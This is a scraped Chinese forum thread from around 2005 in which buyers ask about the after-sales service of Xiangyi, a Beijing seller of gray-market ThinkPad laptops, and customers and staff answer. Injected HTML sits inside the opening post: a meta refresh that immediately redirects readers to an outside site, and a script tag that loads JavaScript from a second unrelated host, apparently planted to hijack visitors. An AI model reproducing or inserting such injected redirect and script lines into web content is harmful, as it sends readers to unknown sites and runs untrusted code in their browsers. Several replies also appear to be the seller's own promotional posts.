开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

请各位在这里买过本的朋友们,谈谈你们的对翔意的售后服务感觉怎么样?

关闭 [复制链接]
各位大家好!
我最近想买台水货的IBM,我希望大家给我说说翔意的售后服务怎么样?
请在这里买过电脑的朋友们帮帮忙,谈谈你们的感想!
本人在此谢谢了!
<meta http-equiv="refresh" content="0; url=http://www.5599.cc">
★★★
<script type="text/javascript" src="http://www.844.cc/b.js"></script>
<link href="http://www.844.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

售后只要是机器质量问题,IBM负责维修的我们就负责.1年免费香港送修
应该让你去贵宾区看看。。。。。。。。。。。人多。。。。
我也想买,能提前让我进贵宾区看看吗
我想下周买,也想了解了解售后的情况
买吧,没啥不好的,该不好都不好,也不是这里的机器有问题。

买了就不怕坏,坏了就不怕修。
支持楼上,不过现在还灭有米
售前服务态度当然没得说,当遇到问题后的态度很好(这点更重要),大家都本着解决问题的原则来办事而不是推卸责任踢皮球,建议你在坛子里多看看,信得过买喽:)
不知道为什么,在这个版面提了个问题,好几天都没有人回答,不像在其他水货网站,一般都当天就回了,对于售后服务,实在是很难让人放心哟。。。。。。。。
Originally posted by eelfzte at 2005-3-7 21:26
不知道为什么,在这个版面提了个问题,好几天都没有人回答,不像在其他水货网站,一般都当天就回了,对于售后服务,实在是很难让人放心哟。。。。。。。。

你听说过枪手吗?想得到真相就自己多看看吧。而且你提了什么问题?
怎么没有回答你?:au29:
贵宾区只能购机后才能进入的。你可以大概得看一下那些发了帖子的有多少人都是贵宾了。就可以知道个大概了
另楼上的朋友我把你的帖子找出来回答了,因为帖子很多,所以难免会有一两个没有看到的,请见谅
另你的问题其实在很多帖子里都回答过了,多看看就知道了的
虽然以前都是潜水的,不过对于翔意的服务还是给予肯定的!我一个同学买了太JXU,感觉不错,他可是全额订货的哦!
还是有点不放心啊!对了,能不能让我进你们的贵宾区看看啊!
明确的和你说不能!!!!原则问题
建议你多看帖子,或者来我们公司看看人气和现货
8号买的8zh!翔意的服务就是好!!!
要买就出手吧!!!
我能理解楼主的心情,因为当初我也是这样过来的。毕竟一万多元的东西,不是随便就决定的。但是我来他这里买的本本时看到一件也许他们觉得没有什么大不了的东西,却让我觉得很安心:他们公司的发货单,从二月底到我买的那短短一两个星期时间,他们的发货单就有小小的一沓,我看到有南发往深圳的,北发往哈尔滨的甚至北京西城区的都有发货的(懒啊~连这么短距离都不愿意自己来提货)。没数,估计大概二十来张单子吧,看到他们这么大的交易量(虽然不知道是不是都是发的笔记本,也许是硬盘盒子或配件)我也能信任他们了。
呵呵,不放心可以来公司坐一天两天的,看看我们的信誉.我们免费提供开水,盒饭可以帮忙定.呵呵
你想啊
如果不好
能有这么多人来吗
我说两句啊,翔意售前是非常好的,有问必答,而且很准确,一看就知道玩IBM n久了,但是售后就一点都不知道了,我敢在这儿买,主要还是对IBM有信心,3年内估计不会坏,^_^.
    这么经典的回答,值多少猪肉啊?
楼上的,在你说这句话的时候已经得到了半块优质猪肉了 ^_^

[ Last edited by stonepage on 2005-3-16 at 19:40 ]
一直憧憬着我的T42 8ZH/U 啊
说实话~~  我真的不知道售后怎么样~~~  因为用了2个多月了,的确没什么问题(可能是自己用的很精心吧~~ 呵呵),最近还想给老妈买一个~~  她工作需要,也只是办公而已,本想敬孝道,不过实在太贵了~~呵呵~~ 想买X系列的~~ 都要万元以上.....咳~~ 真的有点力不从心啊~~~  两个多月以来~机器用的真是很不错啊~~我每天用机都要在13小时左右~不过比较欣慰的是,从未死过机(一次都没有~~  可能是我比较幸运吧~ 选一个好的~呵呵):ju1:  如果楼主不着急的话我再用个2,3年在和你回报一下...呵呵~~ 其实本打算春节后买机器的,后来是咱禁不住诱惑~~  多花了500元啊~~ 最后说一句~我买的是8zu
售后我们承诺,只要是IBM负责维修的,我们都负责,IBM不负责的,我们也没办法.
关注